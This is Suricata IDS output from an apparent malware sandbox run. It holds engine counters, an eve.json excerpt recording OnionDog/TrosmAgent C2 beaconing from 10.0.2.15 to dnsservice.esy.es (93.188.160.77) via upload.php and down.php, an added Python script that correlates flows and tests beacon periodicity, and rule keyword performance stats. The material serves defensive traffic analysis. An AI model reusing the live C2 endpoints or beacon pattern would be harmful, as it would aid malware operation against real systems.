detect.mpm_list                            | Total                     | 14
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 15
app_layer.flow.http                        | Total                     | 322
app_layer.tx.http                          | Total                     | 322
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 2
app_layer.flow.failed_udp                  | Total                     | 7
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 1
flow_mgr.flows_notimeout                   | Total                     | 1
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65535
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7079488


eve.json - (557595 bytes) - download
{"timestamp":"1900-01-00T00:00:10.531887+0000","flow_id":59315646504367,"pcap_cnt":10,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54356,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":1579,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":223,"rdata":"51.145.123.29"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a13-130.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a11-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a5-130.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a28-129.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a12-131.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a7-131.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a9-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a18-128.akagtm.org"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a3-129.akadns.net"}}
{"timestamp":"1900-01-00T00:00:10.532230+0000","flow_id":59315646504367,"pcap_cnt":11,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":54356,"rcode":"NOERROR","rrname":"akadns.net","rrtype":"NS","ttl":36796,"rdata":"a1-128.akadns.net"}}
{"timestamp":"1900-01-00T00:00:15.055753+0000","flow_id":59315646504367,"pcap_cnt":30,"event_type":"dns","src_ip":"10.0.2.15","src_port":1031,"dest_ip":"10.0.2.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8131,"rrname":"dnsservice.esy.es","rrtype":"A","tx_id":1}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"dnsservice.esy.es","rrtype":"A","ttl":14400,"rdata":"93.188.160.77"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns3.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns4.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns2.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.218919+0000","flow_id":59315646504367,"pcap_cnt":33,"event_type":"dns","src_ip":"10.0.2.2","src_port":53,"dest_ip":"10.0.2.15","dest_port":1031,"proto":"UDP","dns":{"type":"answer","id":8131,"rcode":"NOERROR","rrname":"esy.es","rrtype":"NS","ttl":16470,"rdata":"ns1.main-hosting.com"}}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"alert","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"http","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:15.415054+0000","flow_id":824751833440828,"pcap_cnt":41,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1049,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:15.626881+0000","flow_id":1513140601707347,"pcap_cnt":50,"event_type":"alert","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.626881+0000","flow_id":1513140601707347,"pcap_cnt":50,"event_type":"http","src_ip":"10.0.2.15","src_port":1050,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"alert","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"http","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:15.838390+0000","flow_id":1368602067309402,"pcap_cnt":59,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1051,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"pcap_cnt":70,"event_type":"alert","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"pcap_cnt":70,"event_type":"http","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"alert","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"http","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"pcap_cnt":79,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"pcap_cnt":88,"event_type":"alert","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"pcap_cnt":88,"event_type":"http","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"alert","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"http","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"pcap_cnt":102,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.php","gaps":false,"state":"CLOSED","stored":false,"size":54,"tx_id":0}}
{"timestamp":"1900-01-00T00:00:16.846564+0000","flow_id":1338560918587736,"pcap_cnt":111,"event_type":"alert","src_ip":"10.0.2.15","src_port":1056,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012612,"rev":16,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:16.846564+0000","flow_id":1338560918587736,"pcap_cnt":111,"event_type":"http","src_ip":"10.0.2.15","src_port":1056,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"alert","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2816614,"rev":3,"signature":"ETPRO TROJAN OnionDog\/TrosmAgent CnC Beacon","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"http","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain"}}
{"timestamp":"1900-01-00T00:00:17.038384+0000","flow_id":1438176242625862,"pcap_cnt":120,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1057,"dest_ip":"93.188.160.77","dest_port":80,"proto":"TCP","http":{"hostname":"dnsservice.esy.es","url":"\/.\/software1\/upload.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","http_content_type":"text\/plain","http_method":"POST","protocol":"HTTP\/1.1","status":403,"length":35},"app_proto":"http","fileinfo":{"filename":"\/software1\/upload.ph

This file has been truncated.
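The eve.json excerpt above is the raw record stream; to read it as an analyst you correlate the alert, http and fileinfo events that share a flow_id and then look at the cadence of flows from 10.0.2.15 to 93.188.160.77. Note that in this Suricata 4.0 output the http event carries no method or status; those fields appear only on the fileinfo record of the POST, so the flow_id join is what lets you attribute the 403 to the beacon. The script below is an added example and is not part of the analysis output or of IDSDeathBlossom. SAMPLE_EVE is constructed to mirror the records shown (alert + http per GET, alert + http + fileinfo per POST) and keeps only the fields the code reads; the periodicity test and its tolerance are the editor's own heuristic, not a Suricata feature.

```python
"""Correlate Suricata EVE JSON per flow and measure the C2 beacon cadence.

Added example; not part of the analysis output above or of IDSDeathBlossom.
SAMPLE_EVE is constructed to mirror the eve.json records shown (alert + http
per GET, alert + http + fileinfo per POST), keeping only the fields read here.
"""
import json
import re
import statistics
from collections import Counter, defaultdict

SAMPLE_EVE = r'''
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"event_type":"alert","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"alert":{"signature_id":2012612,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","severity":1}}
{"timestamp":"1900-01-00T00:00:16.038016+0000","flow_id":259673723751849,"event_type":"http","src_ip":"10.0.2.15","src_port":1052,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"event_type":"alert","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"alert":{"signature_id":2816614,"signature":"ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon","severity":1}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"event_type":"http","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/upload.php","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"}}
{"timestamp":"1900-01-00T00:00:16.229765+0000","flow_id":215946661762774,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1053,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/upload.php","http_method":"POST","status":403,"length":35},"fileinfo":{"filename":"/software1/upload.php","stored":false,"size":54}}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"event_type":"alert","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"alert":{"signature_id":2012612,"signature":"ET INFO Hiloti Style GET to PHP with invalid terse MSIE headers","severity":1}}
{"timestamp":"1900-01-00T00:00:16.441451+0000","flow_id":1446287288337627,"event_type":"http","src_ip":"10.0.2.15","src_port":1054,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/down.php?file=CQUGKAWELS","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"event_type":"alert","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"alert":{"signature_id":2816614,"signature":"ETPRO TROJAN OnionDog/TrosmAgent CnC Beacon","severity":1}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"event_type":"http","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/upload.php","http_user_agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"}}
{"timestamp":"1900-01-00T00:00:16.656557+0000","flow_id":464870081347406,"event_type":"fileinfo","src_ip":"10.0.2.15","src_port":1055,"dest_ip":"93.188.160.77","dest_port":80,"http":{"hostname":"dnsservice.esy.es","url":"/./software1/upload.php","http_method":"POST","status":403,"length":35},"fileinfo":{"filename":"/software1/upload.php","stored":false,"size":54}}
'''

def parse_eve(text):
    """EVE is newline-delimited JSON: one object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def seconds_of_day(ts):
    """Time-of-day in seconds. The date part is ignored on purpose: this capture
    carries 1900-01-00, which datetime rejects, and gaps only need differences."""
    clock = re.split(r"[+\-Z]", ts.split("T", 1)[1], maxsplit=1)[0]
    h, m, s = clock.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)

def correlate_flows(records):
    """Fold alert, http and fileinfo events into one row per flow_id."""
    flows = {}
    for rec in records:
        row = flows.setdefault(rec["flow_id"], {
            "t": seconds_of_day(rec["timestamp"]), "src_ip": rec["src_ip"],
            "dst": (rec["dest_ip"], rec["dest_port"]), "sids": set(),
            "host": None, "url": None, "method": None, "status": None, "stored": None})
        row["t"] = min(row["t"], seconds_of_day(rec["timestamp"]))
        if rec["event_type"] == "alert":
            row["sids"].add(rec["alert"]["signature_id"])
        http = rec.get("http", {})  # method/status only appear on the fileinfo record here
        for key, field in (("host", "hostname"), ("url", "url"),
                           ("method", "http_method"), ("status", "status")):
            if field in http:
                row[key] = http[field]
        if rec["event_type"] == "fileinfo":
            row["stored"] = rec["fileinfo"]["stored"]
    return flows

def beacon_gaps(flows):
    """Seconds between successive flows from one client IP to one server."""
    by_pair = defaultdict(list)
    for row in flows.values():
        by_pair[(row["src_ip"], row["dst"])].append(row["t"])
    gaps = []
    for times in by_pair.values():
        times.sort()
        gaps.extend(b - a for a, b in zip(times, times[1:]))
    return gaps

def looks_periodic(gaps, tolerance=0.25):
    """Crude beacon test (editor's heuristic): every gap within +/- tolerance of the median."""
    if len(gaps) < 2:
        return False
    med = statistics.median(gaps)
    return all(abs(g - med) <= tolerance * med for g in gaps)

def summarize(text):
    """Signature hit counts, C2 hosts/URLs, rejected POSTs and cadence."""
    flows = correlate_flows(parse_eve(text))
    sids = Counter()
    for row in flows.values():
        sids.update(row["sids"])
    gaps = beacon_gaps(flows)
    return {
        "flows": len(flows),
        "signatures": dict(sids),
        "hosts": sorted({r["host"] for r in flows.values() if r["host"]}),
        "urls": sorted({r["url"] for r in flows.values() if r["url"]}),
        "post_403": sum(1 for r in flows.values()
                        if r["method"] == "POST" and r["status"] == 403),
        "median_gap": statistics.median(gaps) if gaps else None,
        "periodic": looks_periodic(gaps),
    }

if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_EVE), indent=2))
```

Against a real run, read the file with `summarize(open("eve.json").read())`. Two things the summary makes visible that the raw lines do not: the GET to down.php and the POST to upload.php alternate roughly every 0.2 s to the same host with the same terse MSIE 6 User-Agent, which is the cadence the ETPRO beacon rule keys on, and every POST is answered with a 403 while the fileinfo record reports `stored: false` for the 54-byte request body, so the data the implant tried to upload cannot be recovered from this run unless file extraction is enabled and the pcap is replayed.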


keyword_perf.log - (10996 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 8/13/2019 -- 12:11:13
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             244792612       40362           40362           4825588         6064.00         6064.00         0.00           
  content          518442102       75518           51883           10692354        6865.00         6972.00         6629.00        
  pcre             111064374       13203           3381            2284888         8412.00         9191.00         8143.00        
  byte_test        384082          67              52              26896           5732.00         6003.00         4792.00        
  byte_jump        92200           13              13              29150           7092.00         7092.00         0.00           
  isdataat         9666            2               0               4868            4833.00         0.00            4833.00        
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             244792612       40362           40362           4825588         6064.00         6064.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          10925492        1668            846             99862           6550.00         7178.00         5903.00        
  pcre             20696           1               0               20696           20696.00        0.00            20696.00       
  byte_test        384082          67              52              26896           5732.00         6003.00         4792.00        
  byte_jump        92200           13              13              29150           7092.00         7092.00         0.00           
  isdataat         9666            2               0               4868            4833.00         0.00            4833.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          114106286       17066           12236           1047462         6686.00         6603.00         6894.00        
  pcre             73534050        9177            1610            424932          8012.00         8181.00         7976.00        
  urilen           76324260        11431           4347            10448428        6676.00         5563.00         7359.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          46630966        7196            1610            98192           6480.00         6459.00         6486.00        
  pcre             3787776         483             161             116890          7842.00         9982.00         6772.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1891768         322             0               34084           5875.00         0.00            5875.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          214742612       29624           24311           10692354        7248.00         7448.00         6335.00        
  pcre             28069478        2898            966             2284888         9685.00         11019.00        9018.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          23064194        3542            2254            128342          6511.00         6662.00         6247.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2109652         322             322             46222           6551.00         6551.00         0.00           
